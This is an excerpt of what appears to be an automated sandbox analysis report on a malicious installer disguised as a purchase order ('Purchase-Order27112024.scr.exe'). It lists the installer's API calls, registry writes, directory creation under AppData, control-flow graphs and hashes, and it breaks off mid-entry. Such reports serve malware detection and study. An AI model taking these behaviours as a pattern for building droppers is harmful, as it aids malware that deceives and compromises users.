                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Pointer$CountTickWrite
                                                                                                      • String ID: rQ
                                                                                                      • API String ID: 2146148272-3946962983
                                                                                                      • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                                                                      • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 701 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW 708 4029c7-4029d6 701->708 709 40237d-402385 701->709 711 402387-402394 call 402b3a lstrlenW 709->711 712 402398-40239b 709->712 711->712 713 4023ab-4023ae 712->713 714 40239d-4023aa call 402b1d 712->714 718 4023b0-4023ba call 403062 713->718 719 4023bf-4023d3 RegSetValueExW 713->719 714->713 718->719 723 4023d5 719->723 724 4023d8-4024b2 RegCloseKey 719->724 723->724 724->708 726 402793-40279a 724->726 726->708
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl791D.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl791D.tmp
                                                                                                      • API String ID: 1356686001-934515040
                                                                                                      • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                      • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                                                                      • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                      • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 727 4015b9-4015cd call 402b3a call 405a3e 732 401614-401617 727->732 733 4015cf-4015eb call 4059c0 CreateDirectoryW 727->733 735 401646-402197 call 401423 732->735 736 401619-401638 call 401423 call 405f48 SetCurrentDirectoryW 732->736 740 40160a-401612 733->740 741 4015ed-4015f8 GetLastError 733->741 749 402793-40279a 735->749 750 4029c7-4029d6 735->750 736->750 751 40163e-401641 736->751 740->732 740->733 744 401607 741->744 745 4015fa-401605 GetFileAttributesW 741->745 744->740 745->740 745->744 749->750 751->750
                                                                                                      APIs
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 00405A4C
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\googly\pulsation,?,00000000,000000F0), ref: 00401630
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\googly\pulsation, xrefs: 00401623
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                      • String ID: C:\Users\user\AppData\Local\googly\pulsation
                                                                                                      • API String ID: 3751793516-4003725227
                                                                                                      • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                                                                      • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                                                                      • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                                                                      • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 754 402b7a-402ba3 RegOpenKeyExW 755 402ba5-402bb0 754->755 756 402c0e-402c12 754->756 757 402bcb-402bdb RegEnumKeyW 755->757 758 402bb2-402bb5 757->758 759 402bdd-402bef RegCloseKey call 4062b2 757->759 760 402c02-402c05 RegCloseKey 758->760 761 402bb7-402bc9 call 402b7a 758->761 767 402bf1-402c00 759->767 768 402c15-402c1b 759->768 765 402c0b-402c0d 760->765 761->757 761->759 765->756 767->756 768->765 769 402c1d-402c2b RegDeleteKeyW 768->769 769->765 770 402c2d 769->770 770->756
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1912718029-0
                                                                                                      • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                                                                      • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                                                                      • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                                                                      • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 772 10001759-10001795 call 10001b18 776 100018a6-100018a8 772->776 777 1000179b-1000179f 772->777 778 100017a1-100017a7 call 10002286 777->778 779 100017a8-100017b5 call 100022d0 777->779 778->779 784 100017e5-100017ec 779->784 785 100017b7-100017bc 779->785 786 1000180c-10001810 784->786 787 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 784->787 788 100017d7-100017da 785->788 789 100017be-100017bf 785->789 793 10001812-1000184c call 100015b4 call 100024a9 786->793 794 1000184e-10001854 call 100024a9 786->794 809 10001855-10001859 787->809 788->784 795 100017dc-100017dd call 10002b5f 788->795 791 100017c1-100017c2 789->791 792 100017c7-100017c8 call 100028a4 789->792 797 100017c4-100017c5 791->797 798 100017cf-100017d5 call 10002645 791->798 804 100017cd 792->804 793->809 794->809 807 100017e2 795->807 797->784 797->792 813 100017e4 798->813 804->807 807->813 814 10001896-1000189d 809->814 815 1000185b-10001869 call 1000246c 809->815 813->784 814->776 820 1000189f-100018a0 GlobalFree 814->820 822 10001881-10001888 815->822 823 1000186b-1000186e 815->823 820->776 822->814 825 1000188a-10001895 call 1000153d 822->825 823->822 824 10001870-10001878 823->824 824->822 826 1000187a-1000187b FreeLibrary 824->826 825->814 826->822
                                                                                                      APIs
                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                      • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                      • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                      • String ID: XZ
                                                                                                      • API String ID: 334405425-1418392395
                                                                                                      • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                                                                      • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                                                                      • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                                                                      • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00405C01
                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountFileNameTempTick
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                      • API String ID: 1716503409-1857211195
                                                                                                      • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                                                                      • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                      • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                                                                      APIs
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                                                                      • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00403347
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 4115351271-3512041753
                                                                                                      • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                                                                      • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                                                                      • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                                                                      • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                                                                      • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                                                                      • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                                                                      • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                                                                      • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
